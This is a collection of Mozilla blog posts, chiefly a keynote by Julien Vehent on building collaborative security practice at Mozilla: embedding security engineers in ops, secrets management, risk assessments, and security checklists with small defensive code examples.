A software developer with a knack for finding bugs, B.J. is an avid user of ASan Nightly and is passionate about improving open source software. “The best experience is when I catch a bug in Nightly and it gets fixed before that code ships,” B.J. says. “It doesn’t happen every month, but it happens enough to feel good.”

Following his retirement in 2017, B.J. spends his time working on software and web development programs, volunteering at a local food pantry, and traveling the world with his wife. He also enjoys collecting and studying coins, and playing Dungeons and Dragons. “I’ve played D&D with some of the other players for over forty years, and some other players are under half my age,” B.J. says.

Thank you so much for your contributions to keeping our ecosystem safe and healthy, B.J.!

If you are interested in getting involved with the add-ons community, please take a look at our current contribution opportunities.

The post Friend of Add-ons: B.J. Herbison appeared first on Mozilla Add-ons Blog.

https://blog.mozilla.org/addons/2019/10/02/friend-of-add-ons-b-j-herbison/

|

|

The Firefox Frontier: Steps you can take to protect your identity online |

Data breaches are one of many online threats. Using secure internet connections, updating your software, avoiding scam emails, and employing better password hygiene will all help you stay safer while …

The post Steps you can take to protect your identity online appeared first on The Firefox Frontier.

https://blog.mozilla.org/firefox/protect-your-identity-online/

|

|

Hacks.Mozilla.Org: Video Shorts from Mozilla Developer |

We’re excited to launch a new resource for people who build the web! It will include short videos, articles, demos, and tools that teach web technologies and standards, browser tools, compatibility, and more. No matter your experience level or job description, we’re all working together towards the future health of the web, and Mozilla is here to help.

Today we’re launching a new video channel, with a selection of shorts to kick things off. There are two in our “about:web” series on web technologies, and one in our “Firefox” series on browser tools for web professionals.

Get started with an intro to Dark Mode on the web, by Deja Hodge — and check out her dark mode demo.

Jen Simmons shows us how to access a handy third panel in the Firefox Developer Tools, and toggle print preview mode.

If you’ve ever struggled to style lists with customized bullets and numbers, Miriam Suzanne has a video all about the ::marker pseudo-element and list counters. Watch the video, and go play with the demo on CodePen.

To celebrate the launch, we’ll be releasing new videos every day this week! Check back to learn about several more Firefox tools like Screenshots and the CSS Track Changes panel, and a reflection on what makes CSS so weird. Over the next few months we’ll have new videos weekly (subscribe to the channel!), along with more articles, demos, and some exciting new open source tools.

The post Video Shorts from Mozilla Developer appeared first on Mozilla Hacks - the Web developer blog.

https://hacks.mozilla.org/2019/10/video-shorts-from-mozilla-developer/

|

|

Aaron Klotz: Coming Around Full Circle |

One thing about me that most Mozillians don’t know is that, when I first applied to work at MoCo, I had applied to work on the mobile platform. When all was said and done, it was decided at the time that I would be a better fit for an opening on Taras Glek’s platform performance team.

My first day at Mozilla was October 15, 2012 – I will be celebrating my seventh anniversary at MoCo in just a couple short weeks! Some people with similar tenures have suggested to me that we are now “old guard,” but I’m not sure that I feel that way! Anyway, I digress.

The platform performance team eventually evolved into a desktop-focused performance team by late 2013. By the end of 2015 I had decided that it was time for a change, and by March 2016 I had moved over to work for Jim Mathies, focusing on Gecko integration with Windows. I ended up spending the next twenty or so months helping the accessibility team port their Windows implementation over to multiprocess.

Once Firefox Quantum 57 hit the streets, I scoped out and provided technical leadership for the InjectEject project, whose objective was to tackle some of the root problems with DLL injection that were causing us grief in Windows-land.

I am proud to say that, over the past three years on Jim’s team, I have done the best work of my career. I’d like to thank Brad Lassey (now at Google) for his willingness to bring me over to his group, as well as Jim, and David Bolter (a11y manager at the time) for their confidence in me. As somebody who had spent most of his adult life having no confidence in his work whatsoever, their willingness to entrust me with taking on those risks and responsibilities made an enormous difference in my self-esteem and my professional life.

Over the course of H1 2019, I began to feel restless again. I knew it was time for another change. What I did not expect was that the agent of that change would be James Willcox, aka Snorp. In Whistler, Snorp planted the seed in my head that I might want to come over to work with him on GeckoView, within the mobile group which David was now managing.

The timing seemed perfect, so I made the decision to move to GeckoView. I had to finish tying up some loose ends with InjectEject, so all the various stakeholders agreed that I’d move over at the end of Q3 2019.

Which brings me to this week, when I officially join the GeckoView team, working for Emily Toop. I find it somewhat amusing that I am now joining the team that evolved from the team that I had originally applied for back in 2012. I have truly come full circle in my career at Mozilla!

So, what’s next?

I have a couple of InjectEject bugs that are pretty much finished, but just need some polish and code reviews before landing.

For the next month or two at least, I am going to continue to meet weekly with Jim to assist with the transition as he ramps up new staff on the project.

I still plan to be the module owner for the Firefox Launcher Process and the MSCOM library; however, most day-to-day work will be done by others going forward.

I will continue to serve as the mozglue peer in charge of the DLL blocklist and DLL interceptor, with the same caveat.

Switching over to Android from Windows does not mean that I am leaving my Windows experience at the door; I would like to continue to be a resource on that front, so I would encourage people to continue to ask me for advice.

On the other hand, I am very much looking forward to stepping back into the mobile space. My first crack at mobile was as an intern back in 2003, when I was working with some code that had to run on PalmOS 3.0! I have not touched Android since I shipped a couple of utility apps back in 2011, so I am looking forward to learning more about what has changed. I am also looking forward to learning more about native development on Android, which is something that I never really had a chance to try.

As they used to say on Monty Python’s Flying Circus, “And now for something completely different!”

http://dblohm7.ca/blog/2019/09/30/coming-around-full-circle/

|

|

Julien Vehent: Beyond The Security Team |

This is a keynote I gave at DevSecCon Seattle in September 2019. The recording of that keynote should be available soon.

Good morning everyone, and thank you for joining us on this second day of DevSecCon. My name is Julien Vehent. I run the Firefox Operations Security team at Mozilla, where I lead a team that secures the backend services and infrastructure of Firefox. I’m also the author of Securing DevOps.



This story starts a few months ago, when I am sitting in our mid-year review with management. We’re reviewing past and future projects, looking at where the dozen or so people in my group spend their time, when my boss notes that my team is underinvested in infrastructure security. It’s not a criticism. He just wonders if that’s ok. I have to take a moment to think through the state of our infrastructure. I mentally go through the projects the operations teams have going on, and list the security audits and incidents of the past few months.



I pull up our security metrics and give the main dashboard a quick glance before answering that, yes, I think reducing our investment in infrastructure security makes sense right now. We can free up those resources to work on other areas that need help.

Infrastructure security is probably where security teams all over the industry spend the majority of their time. It’s certainly where, in the pre-cloud era, they used to spend most of their time.

Up until recently, this was true for my group as well. But after years of working closely with ops on hardening our AWS accounts, improving logging, integrating security testing in deployments, secrets management, instance updates, and so on, we have reached the point where things are pretty darn good. Instead of implementing new infrastructure security controls, we spend most of our time making sure the controls that exist don’t regress.

It didn’t use to be this way

So I was working in a suit and tie at a bank in Paris, and the stereotypes were true: we were taking long lunches, occasionally drinking wine and napping during soporific afternoon meetings. Eating lots of cheese and running out of things to do in our 8 or 9 weeks of vacation. Those were the days. And when it came to security, we were the supreme authority of the land. A select few that all engineers feared, our words could make projects live or die.



This is how a deployment worked back then. This was pre-devops, when a deployment could take three weeks and everyone was fine with it. An engineering group would kick off a project, carefully plan it, come up with an elegant and performant design, spend weeks of engineering building the thing. And don’t get me wrong, the engineering teams were absolutely top-notch. Best of the best. 100% French quality that the rest of the world continues to envy us today. Then they would try to deploy their newborn and, “WAIT, what the hell is this?” asks the security team who just discovered the project.

This is where things usually went sideways for engineering. Security would freak out at the new project, complain that it wasn’t consulted, delay production deploys, use its massive influence to make last minute changes and integrate complex controls deep into the new solution. Eventually, it would realize this new system isn’t all that risky after all, it would write a security report about it, and engineering would be allowed to deploy it to production.



In those environments, trust wasn’t even an option. Security decisions were made by security engineers and that was that. Developers, operators and architects of all levels were expected to bring every security topic to the security team, from asking for permission to open a firewall rule, to picking a hash algorithm for their app. No one dared bypass us. We had so much authority we didn’t hesitate to go up against multi-million dollar projects. In a heavily regulated industry, no one wants a written record of the security team raising the alarm on their projects.

On the first day of the conference, we heard Tanya talk about the need to shift left, and I think this little overly-dramatic story is a good example of why it’s so important that we do so. Shifting left means moving our security work closer to the design phases of engineering. It means being part of the early cycles of the SDLC. It means removing the security surprise from the equation. You’ve probably heard everyone mention something along those lines in recent years. I’m probably preaching to the choir here, but I thought it may be useful to remind those of us who haven’t lived through these broken security models why it’s so important we don’t go back to them.

First, it slows projects down dramatically. We talked about the ratio of 1 security engineer to 100 developers yesterday. Routing all security topics through the security team creates a major bottleneck that delays work and generates frustrations. If you’ve worked in organizations that require security reviews before every push to production, you’ve experienced this frustration. Backlogs end up being unmanageable, and review quality drops significantly.

Secondly, non-security teams feel exempt from having to account for security and spend little time worrying about how vulnerable their code is to attacks, or how permeable their perimeter is. Why should they spend time on security, when the organization clearly signals that it isn’t their problem to worry about?

We knew back then this model wasn’t sustainable, but there was little incentive to change it. Security teams didn’t want to give up the power they had accumulated over the years. They wanted more power, because security was never good enough and our society as we knew it was going to end in an Armageddon of buffer overflows should the sysadmins disable SELinux in production to allow for rapid release cycles.

Getting closer to devs & ops

Something that I should mention at this point is I’m an odd security engineer. What I love doing is actually building and shipping software, web applications and internet services in particular. I’ve been doing that for much longer than I’ve been doing security. At some point in my career, I was running a marketing website affiliated with “Who wants to be a millionaire”.

Yeah, that TV Game that airs every day at lunchtime around the country. They would air a question on the show that people had to answer on our website to win points they could use to buy stuff. I gotta say, this was a proud moment of my career. I felt a strong sense of making the world a better place then. It was powerful.

Anyways, this was a tiny operation, from a web perspective. When I joined, we had one Java webapp directly connected to the internet, and one Oracle database. I upgraded that to an HAProxy load balancer, three app servers, and a beefier Oracle database. It was all duct tape and cut corners, but it worked, and it made money. And it would crash every day. I remember watching the real-time metrics out of HAProxy when they would air the question, and it would spike to 2000 requests per second until the site would fall down. Inevitably, every day, the site would break and there was nothing I could do about it. But business was happy because before we had crashed, we had made money.

The point I’m trying to make here is not that I’m a shitty sysadmin who used to run a site that broke every day. It’s that I understand things don’t need to be perfect to serve their purpose. Unless you work at a nuclear plant or a hospital, it’s often more important to serve the business than to have perfect security.

A little more than four years ago, I joined a small operations team focused on building cloud services for Firefox. They were adopting all the new stuff: immutable systems, fully automated deployments controlled by Jenkins pipelines, autoscaling groups, load balancing based on application health, and so on. It was an exciting greenfield where none of my security training applied and everything had to be reevaluated from scratch. A challenge, if I ever had one. The chance to shape security in a completely different way.

So I joined the cloud operations team as a security engineer. The only security engineer. In the middle of a dozen or so hardened ops who were running stuff for millions of Firefox users. I live in Florida. We know that swimming in gator-infested ponds is just stupid. The same way, security engineers generally avoid getting cornered by hordes of angry sysadmins. They are the enemy, you see. They are the ones who leave mission critical servers open to the internet. They are the ones who don’t change default passwords on network gear. They are the ones who ignore you when you ask for a system update seven times in a row. They are the enemy.

To be fair, they see us the same way. We’re Sauron, on top of our dark tower, overseeing everything. We corrupt the hearts and minds of their leaders. We add impossible requirements to time constrained projects. We generally make their lives impossible.

And here I was. A security guy. Joining an ops team.

By and large, they were nice folks, but it quickly became clear that any attempt at playing the arrogant French security guy who knows it all and dictates how things should be would be met with apathy. I had to win this team over. So I decided to pick a problem, solve it, make their life easier and win myself some goodwill.



I didn’t have to search for long. Literally days before I joined the team, a mistake happened and the git repository containing all the secrets got merged into the configuration management repo. It was a beautiful fuck-up, executed with brio, with the full confidence of a battle-tested engineer who has run these exact commands hundreds of times before. The culprit is a dear friend and colleague of mine who I like to use as an example of professionalism with the youngsters, and I strongly believe that what failed then was not the human layer, but completely inadequate tooling.

We took it as a wake-up call that our process needed improvement. So as my first project, I decided to redesign secrets management. There was momentum. Existing tooling was inadequate. And it was a fun greenfield project. I started by collecting the requirements: applications needed to receive their secrets upon initialization, and in autoscaling groups that had to happen without a human taking action. This is a solved problem nowadays known as the bootstrapping of trust, where we use the identity given to an instance to grant permissions to resources, such as the ability to download a given file from S3 or the permission to decrypt with a KMS key. At the time, those concepts were still fairly new, and as I was working through the requirements, something interesting happened.
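As a rough illustration of the bootstrapping-of-trust idea, here is a toy in-memory model. It does not call any real AWS API and is not how Sops works: the policy table, the role and resource names, and `fetchSecrets` are hypothetical, and the returned secret is a placeholder.

```javascript
// Hypothetical policy table: which role may perform which action on which resource.
const policies = [
  { role: "webapp-prod", action: "kms:Decrypt", resource: "key/webapp-secrets" },
  { role: "webapp-prod", action: "s3:GetObject", resource: "bucket/secrets/webapp.enc" },
];

// The instance never presents a password; in this model the platform
// attached a role to it at launch, and that role is its identity.
function isAllowed(instance, action, resource) {
  return policies.some(
    (p) => p.role === instance.role && p.action === action && p.resource === resource
  );
}

// Provisioning step run at boot, with no human involved:
// the secrets are released only if the instance identity permits it.
function fetchSecrets(instance) {
  const canDownload = isAllowed(instance, "s3:GetObject", "bucket/secrets/webapp.enc");
  const canDecrypt = isAllowed(instance, "kms:Decrypt", "key/webapp-secrets");
  if (!canDownload || !canDecrypt) {
    throw new Error(`instance ${instance.id} is not authorized to read secrets`);
  }
  return { dbPassword: "decrypted-placeholder" };
}

// An autoscaled instance launched with the right role gets its secrets.
const secrets = fetchSecrets({ id: "i-0001", role: "webapp-prod" });
```

The point of the model is that authorization follows from the identity assigned at launch, so new instances in an autoscaling group can provision themselves without anyone handing them credentials.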

In a typical security project, I’d gather all the requirements, pick the best possible security architecture and implement it in the cleanest possible way. I’d then spend weeks or months selling my solutions internally, relentlessly trying to convert people to my cause, until everyone agreed or caved.

But in this project, I decided to talk to my customers first. I sat down with every ops who would use the thing and spent the first few weeks of the project studying the provisioning logic and the secrets management workflow. I also looked at the state of the art, and added some features I really wanted, like clean git history and backup keys.

By the time I had reached the fourth proposal, the ops team had significantly shaped the design to fit their needs. I didn’t need to sell them on the value, because by then, they had already decided they really needed, and wanted, the tool. Mind you, I hadn’t written a single line of code yet, and I wasn’t sure I could implement everything we had talked about. There was a chance I had oversold the capabilities of the tool, but that was a risk worth taking.



It took a couple of months to get it implemented. The first version was written in ugly Python, with few tests and poor cross-platform support. But it worked, and it continues to work (after a rewrite in Go). The result of this project is the open source secrets management tool called Sops, which has been our internal standard for a little over three years now. Since I started this talk, perhaps a dozen EC2 instances have autoscaled and called Sops to decrypt their secrets for provisioning.

Don’t just build security tools.

Build operational tools that do things securely.

I spent a couple years embedded in that operations team, working closely with devs & ops, sharing their successes and failures, and helping the team mature its security posture from the inside. I wrote Securing DevOps during those years, and I transferred a lot of what I learned from ops into the book.

I found it fascinating that, while I always had a strong opinion about security architecture and the technical direction we were taking, being down in the trenches dramatically changed my methods. I completely stopped trying to use my security title to block a project, or go against a decision. Instead, I would propose alternative solutions that were both viable and reasonable, and negotiate a middle ground with the parties involved. Now, to be fair, the team dynamic helped a lot, particularly having a manager who put security at equal footing with everything else. But being embedded with Ops, effectively being an ops, greatly contributed to this culture. You see, I wasn’t just any expert in the room, I was their expert in the room, and if something went sideways, I would take just as much blame as everyone else.



There are two generally accepted models for building security teams. The centralized one, where all the security people report to a CISO who reports to the CEO, and the distributed one, where security engineers are distributed into engineering teams and a CISO sets the strategy from the top of the org. Both of these models have their pros and cons.

The centralized one generally has better security strategy, because security operates as a cohesive group reporting to one person. But its people are so far away from the engineering teams that actually do the work that it operates on incomplete data and a lot of assumptions.

The distributed model is pretty much the exact opposite. It has better information from being so close to where things happen, but its reporting chain is directly tied to the organization’s hierarchy, and the CISO may have a hard time implementing a cohesive security strategy org-wide.



The embedding model is sort of a hybrid between these two that tries to get the best of both worlds. Having a strong security organization that reports to an influential CISO is good, and having access to real-world data is also critical to making the right decisions. Security engineers should then report to the CISO but be embedded into engineering teams.

Now, "embedded" here has a strong meaning. It doesn’t just mean that security people snoop into these teams’ chatrooms and weekly meetings. It means that the engineering managers of these teams have partial control of the security engineers. They can request their time and change their priorities as needed. If a project needs an urgent review, or an incident needs handling, or a tool needs to be written, the security engineers will step in and provide support. That’s how you show the organization that you’re really 100% in, and not just a compliance group on the outskirts of the org.



Reverse embedding is also very important, and we’ve had that model in the security industry for many years: it’s called security champions. Security champions are engineers from your organization who have a special interest in security. Oftentimes, they are more senior engineers who are in architect roles or deep experts who consider security to be a critical aspect of their work. They are the security team’s best friends. Its partners throughout the organization. They should be treated with respect and given as much support as possible, because they’ll move mountains for you.

Security champions should have full access to the security team. No closed-door meetings they are excluded from, no backchannel discussions they can’t participate in. If you can’t trust your champions, you can’t trust anyone in your org, and that’s a pretty broken situation.

Champions must also be involved with setting the security strategy. If you’re going to adopt a framework or a platform for its security properties, make sure to consult your champions. If they are on board, they’ll help sell that decision down the engineering chain.

Avoid Making Assumptions

If you embed your security engineers into the dev and ops teams, and open the doors of your organization to security champions, you’ll allow information to flow freely and make better decisions. This allows you to dramatically reduce the number of assumptions you have to make every day, which directly correlates to stronger security.

The first project I worked on when I joined Mozilla was called MIG, for Mozilla InvestiGator (the logo was a gator, for investigator, get it?). The problem we were trying to solve was inspecting our live systems for indicators of compromise in real-time. Back in 2013, we already had too many servers to run investigations manually. The various methods we had tried all had drawbacks. The most successful of them involved running parallel ssh from a bastion host that had ssh keys and firewall rules to connect everywhere. If that sounds terrifying to you, it’s because it was. So my job was to invent a system that could securely connect to all those systems to tell us if a file with a given checksum was present, which would indicate that malware or a backdoor existed on the host.
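The core check described here, looking for a file with a given checksum, can be sketched for a single host. This is only an illustration in Node.js and not MIG's code: the function names are hypothetical, SHA-256 is an assumed choice of hash, and it leaves out the hard part of the project, which was running such checks securely across many systems.

```javascript
const crypto = require("crypto");
const fs = require("fs");
const path = require("path");

// Return the SHA-256 digest of a file as a lowercase hex string.
function sha256OfFile(filePath) {
  return crypto.createHash("sha256").update(fs.readFileSync(filePath)).digest("hex");
}

// Recursively walk `root` and collect regular files whose digest equals `wanted`.
// Symbolic links are skipped, since their directory entries are neither files nor directories.
function findFilesByChecksum(root, wanted) {
  const target = wanted.toLowerCase();
  const matches = [];
  for (const entry of fs.readdirSync(root, { withFileTypes: true })) {
    const fullPath = path.join(root, entry.name);
    if (entry.isDirectory()) {
      matches.push(...findFilesByChecksum(fullPath, target));
    } else if (entry.isFile() && sha256OfFile(fullPath) === target) {
      matches.push(fullPath);
    }
  }
  return matches;
}
```

Calling `findFilesByChecksum("/some/dir", knownBadDigest)` would return the paths of any matching files under that directory, where both arguments are placeholders supplied by the investigator.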

That project was cool as hell! How often do you get to spend 2 years implementing a completely novel agent-based system in a new language? I had a lot of fun working on MIG, and it saved our bacon a few times. But quickly what became evident was that we were running the same investigations over and over. We had some fancy modules that could look for byte strings in memory, or run complex analysis on files, but we never used them. Instead, we used MIG as an inventory tool to find out which version of a package was installed on a system, or which host could connect to the internet through an outbound gateway. MIG wasn’t so much of a security investigation platform as it was an inventory one, and it was addressing a critical need: the need for information.

Every security incident starts with an information gathering phase. You need to understand exactly how much is impacted, and what is the risk of propagation, before you can work on mitigation. The inventory problem continues to be a major concern in infosec. There are too many versions of too many applications running on too many systems for anyone to keep track of them effectively. And this is even ignoring the problem Shadow IT poses to organizations that haven’t modernized fast enough. As security experts, we operate in the dark most of the time, so we make assumptions.

I’ve grown to learn that assumptions are at the root of most vulnerabilities. The NYTimes wrote a fantastic article on how Boeing built a defective 737 Max, and I’ll let you guess what’s at the core of it: assumptions. In their case it’s, and I quote the New York Times article here: “After Boeing removed one of the sensors from an automated flight system on its 737 Max, the jet’s designers and regulators still proceeded as if there would be two.” The article is truly eye opening on how people making assumptions about various parts of the systems led to the plane being unreliable, with dramatic consequences.

I've made too many assumptions throughout my career, and too often did they prove to be entirely wrong. One of them even broke Firefox for our entire user base. Nothing good comes from making assumptions.

Assumptions lead to vulnerability

Nowadays, I assess the security maturity of an organization by how many assumptions its security team is making. It’s terrifying, really. But we have a cure, it’s Data. Having better inventories, something cloud infrastructure truly helps us with, is an important step toward fixing out-of-date systems. Clearing up assumptions on how systems interconnect reduces the attack surface. Etc, etc.

Data is a formidable silver bullet for a lot of things, and it must be at the core of any decent security strategy. The more data you have, the easier it is to take risks. Good security metrics, updated daily, are what helped me answer my boss’s question and say that we were okay reinvesting our resources in other areas. Those dashboards are also what upper management wants to see. Not that they necessarily want to know the details of the dashboard, though sometimes they do, but they want to make sure you have that data, that you can answer questions about the organization’s security posture, and that you can make decisions based on accurate information.

Data does not come out of thin air. To get good data, you need good tests, good monitoring and good telemetry. Security teams are generally pretty good at writing tests, but they don’t always write the right tests.



Above is an example of an AWS test from our internal framework called “frost”. It checks that EC2 instances are running on an acceptable AMI version. You can see that code for yourself, it’s open source at github.com/mozilla/frost. What’s interesting about this test is that it took a few iterations to get it right. Our first attempt was just completely wrong and flagged pretty much every production instance as insecure, because we weren't aligned with the ops team, and had written the test without consulting them.

In this case, we flag an instance as insecure if it is running on an AMI that isn’t owned by us and that is older than a configured max age. This is a good test, and we can give that data directly to the ops team for action. It’s really worthwhile spending extra time making sure your tests are trustworthy, because otherwise you’re sending compliance reports no one ever reads or takes action on, and you’re pissing people off.
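The rule described above can be sketched in a few lines of Python. This is not the actual frost test: the `Instance` class, its fields, and the `is_insecure` helper are hypothetical names made up for illustration, and a real check would pull this data from the AWS API.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class Instance:
    """Hypothetical, simplified view of an EC2 instance and the AMI it runs."""
    instance_id: str
    ami_owner_id: str      # AWS account that owns the AMI
    ami_created: datetime  # when the AMI was created


def is_insecure(instance, owned_account_ids, max_age, now=None):
    """Flag an instance only if its AMI is not ours AND is older than max_age."""
    now = now or datetime.now(timezone.utc)
    not_ours = instance.ami_owner_id not in owned_account_ids
    too_old = (now - instance.ami_created) > max_age
    return not_ours and too_old
```

Both conditions have to hold for an instance to be flagged. An old AMI that we own, or a recent AMI from someone else, passes the check, which is the kind of detail that is easy to get wrong when the test is written without the ops team.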

Setting the expectations

But data and tests only reflect how well you’re growing the security awareness in your organization. They don’t, in and of themselves, mature your organization. So while it is important to spend time improving your testing tools and metrics gathering frameworks, you should also spend time explaining to the organization what your ideal state is. You should set the expectations.





A few years ago, we were digging through our metrics to understand how we could get websites and APIs to a higher level of security. It was clear we weren’t being successful at deploying modern security techniques like Content Security Policy or HSTS. It seemed like every time we would perform a risk assessment, we would get a full buy-in from dev teams, and yet those controls would never make it to the production version. We had an implementation problem.

So we tried a few things, hoping that one of them would catch on.



We first pushed on the idea that every deployment pipeline would invoke ZAP right after the pre-production site was deployed. I talked about this in the book under the idea of test-driven security, and I use examples of invoking a container running ZAP in CircleCI. The ZAP container would scan a pre-production version of the site and output a compliance report against a web security baseline. The report was explicit in calling out missing controls, so we thought it would be easy for devs to adopt it and fix their webapps. But it didn’t take off. We tried really hard to get it included in Jenkins deployment pipelines and web applications CI/CD, and yet the uptake was low, and fairly short lived. The integrations would get disabled as soon as it became annoying (too slow, blocking deploys, etc...). The tooling just wasn't there yet.



But the idea of the “baseline”, this minimal set of security controls we wanted every website and API to implement, was fairly successful. So we turned it into a checklist in markdown format that could easily be copied into GitHub issues.

This one worked out beautifully. We would create the checklist in the target repository while running the risk assessment, and devs would go through it as part of their pre-launch check. Over time, we added dozens of items to the checklist, from new controls like checking for out-of-date dependencies, to traps we wanted devs to avoid like refusing to proxy requests to AWS instance metadata. The checklist got big, and many items don’t apply to most projects, but we just cross them off and let the devs focus on the stuff that matters. They seem to like it.
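To give an idea of how little tooling this takes, here is a minimal sketch that renders a baseline as a markdown task list ready to paste into a GitHub issue. The `render_checklist` helper and the wording of the items are assumptions for illustration, loosely based on the controls mentioned in this talk, and not the actual Mozilla checklist.

```python
# Illustrative items only, not the real checklist.
BASELINE = [
    "Set a Content Security Policy",
    "Enable HSTS",
    "Use SameSite cookies",
    "Check for out-of-date dependencies",
    "Refuse to proxy requests to AWS instance metadata",
]


def render_checklist(title, items):
    """Return a markdown task list that GitHub renders as checkboxes."""
    lines = [f"## {title}", ""]
    lines += [f"- [ ] {item}" for item in items]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_checklist("Security checklist", BASELINE))
```

Items that don’t apply to a project can simply be struck through or deleted in the issue once it is created.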

And something else interesting happened: project managers started tracking completion of the checklist as part of their own pre-launch checklist. We would see security checklist completeness being mentioned as part of a readiness meeting with directors. It got taken seriously, and as a result every single website we launched over the last couple years implements content security policy, HSTS, same site cookies and so on.

The checklist isn’t the only thing that helped improve adoption. Giving developers self-service security tools is also very important. And the approach of giving letter grades has an interesting psychological effect on engineering teams, because no one wants to ship a production site that gets an F or even a C on the publicly accessible security assessment tool. Everyone wants an A+. And guess what? Following the checklist does give you an A+. That makes the story pretty straightforward: follow the checklist, and you’ll get your nice A+ on the Observatory.

Clear Expectations → Checklist → Self Assessment → Profit

This particular model may not work exactly for your organization. The power dynamics and internal politics may be different. But the general rule still applies: if you want security to be adopted in products that ship, set the expectations early and clearly. Don’t give them vague rules like “only use encryption algorithms that provide more than 128 bits of security”. No one knows what that means. Instead, give them information they can directly translate into code, like a content security policy they can copy and paste then tweak, or a logging library they can import in their apps that spits out the right format from the get go. Set the expectations, and make them easy to follow. Devs and ops are too busy to jump through hoops.
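As an illustration of “information they can directly translate into code”, here is a minimal sketch of a copy-and-paste baseline plus a check that reports what is missing. The header values are generic starting points that I am assuming for the example, not an official Mozilla baseline, and `missing_headers` is a hypothetical helper.

```python
# Illustrative starting values: copy, paste, then tweak for your app.
BASELINE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "Strict-Transport-Security": "max-age=63072000",
}


def missing_headers(response_headers, baseline=BASELINE_HEADERS):
    """Return the baseline header names absent from a response.

    HTTP header names are case-insensitive, so compare in lowercase.
    """
    present = {name.lower() for name in response_headers}
    return [name for name in baseline if name.lower() not in present]
```

A dev can run something like this against their own staging site and see right away which controls are missing, without having to ask anyone.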

Once you’ve set the expectations, give them checklists and the tools to self-assess. Don’t make your people ask you every time they need a check of their webapp; it bothers them as much as it bothers you. Instead, give them security tools that are fully self-service. Give them a chance to be their own security team, and to make you obsolete. Clear expectations and self-service security tools are how you build up adoption.

Not having to say “no”

There is another anti-pattern of security team I’d like to address: it’s the stereotypical “no” team. The team that operates in organizations where engineers keep bringing up projects they feel they have to shut down because of how risky they are. Those security people are usually not a happy bunch. You rarely see them smile. They complain a lot. They look way older than they really are. Maybe they took up drinking.

See, I’m a happy person. I enjoy my work, and I enjoy the people I work with, and I don’t want to end up like that. So I set a personal goal to pretty much never have to say no.

The safe approach here should be simple: cover the little devil in bubble wrap, and don’t let her leave the safe space of her playpen. There, problem solved. Now if she could just stop growing...

And by the way, you CAN buy bubble wrap baby suits. It’s a thing. For those of you with kids, you may want to look into it.



There is a famous quote from one of my personal heroes: Rear Admiral Grace Hopper. She invented compilers, back when computers were barely a thing. She used to hand out nanoseconds to military officers to explain how long messages took to travel over the wire. A nanosecond here is a small piece of wire about 30cm long (that’s almost a foot, for all you Americans out there) that represents the maximum distance that light or electricity can travel in a billionth of a second. When an admiral would ask her why it takes so damn long to send a message via a satellite, she’d point out that between here and the satellite there’s a large number of nanoseconds.

Anyway, Admiral Hopper once said “ships are safe in harbor, but that’s not what ships are for”. If you only remember two things from this talk, add that one to the list.

As a dad, it is literally my job to paternalize my kid. A lot of security teams feel the same way about their daily job. Let me argue here that this is completely the wrong approach. It’s not your job to paternalize your organization. The people you work with are adults capable of making rational decisions, and when they decide to ignore a risk, they are also making a rational decision. You may disagree with it, and that’s fine, but you shouldn’t presume that you know better than everyone else involved.

What our job as security professionals really is, is to help the organization make informed decisions. We need to surface the risks, explain the threats, perhaps reshape the design of a project to better address some concerns. And when everything is said and done, the organization can decide for itself how much risk it is willing to accept.

At Mozilla, instead of saying no, we run risk assessments and threat models together as a team, then we make sure everyone agrees on the assessment, and on whether it’s an appropriate amount of risk to take. The security team may have concerns over a specific feature, only to realize during the assessment that those concerns aren’t really that high. Or perhaps they are, and the engineering team didn’t realize that until now and is perfectly willing to modify or remove that feature entirely. And sometimes the project simply is risky by nature, but it’s only being rolled out to a small number of users while being tested out.



The point of risk assessments and threat modeling isn’t only to identify the risks. It’s to help the organization make informed decisions about those risks. A security team that simply says “no” doesn’t solve anyone’s problems. Instead, build yourself an assessment framework that can evaluate new projects and features, and can get people to take calculated risks based on the environment the business operates in.

We call this framework the “Rapid Risk Assessment”, or RRA. Guillaume Destuynder and I introduced this framework at Mozilla back in 2013, and over the last 6 years we have run hundreds, if not thousands, of RRAs with everyone in the organization. I still haven’t heard anyone call the exercise a waste of time. RRAs are a bit different from standard risk assessments. They are short, 30 minutes to one hour, and focused on small components. It’s more of a security and threat discussion than a typical matrix-based risk framework, and I think this is why people actually enjoy them. One particular team even told me once they were looking forward to running the RRA on their new project. How cool is that?

Having a risk assessment framework is nice, but you can also get started without one. In the panel yesterday, Zane Lackey told the story of introducing risk assessments at Etsy by joining engineering meetings and simply asking "How would you attack this app?" to the devs. This works, I've asked similar questions many times. Guillaume's favorite is "what would happen should the database leak on Twitter?". Devs & Ops are much better at threat modeling than they often realize, and you can see the wheels spinning in their brains when you ask this type of question. Try it out, it's actually fun!

Being Strategic

By this point in the talk, I hope that I’ve convinced you security is owned well beyond the security team, and you might be tempted to think that perhaps we could get rid of all those pesky security people altogether. I’ll be honest, that’s the end game for me. The digital world will adopt perfect security. People will carefully consider their actions and take the right amount of risk when appropriate. They will communicate effectively and remove all assumptions in their work. They will treat each other with respect during security incidents and collaborate effectively toward a resolution. And I’ll be serving fresh Mojitos at a Tiki bar over there by the beach.

Not a good deal for security conferences really. Sorry Snyk, this may have been a bad investment. But I have a feeling they’ll be doing fine for a while. Until those blessed days come, we’ve got work to do.

A mature security team may not need to hold the hands of its organization anymore, but it still has one job: it must be strategic. It must foresee threats long before they impact the organization, and it must plan defenses long before the organization has to adopt them. It’s easy for security teams to get caught up in the tactical day-to-day, going from review to incident to review to incident, but doing so does not effectively improve anything. The real gratification, the one that no one else gets to see but your own team, is seeing every other organization but your own battle a vulnerability you’re not exposed to because of strategic choices you made long ago.

Let me give you an example: I’m a strong supporter of putting our admin panels behind VPN. Yes, VPNs. Remember them? Those old dusty tunnels that we used to love in the 2000s until zero trust became all the rage and every vendor on the planet wanted you to replace everything with their version of it. Well, guess what, we do zero trust, but we also put our most sensitive admin panels behind VPN. The reason for it is simply defense in depth. We know authentication layers fail regularly, we have tons of data to prove it, and we don’t trust them as the only layer of defense.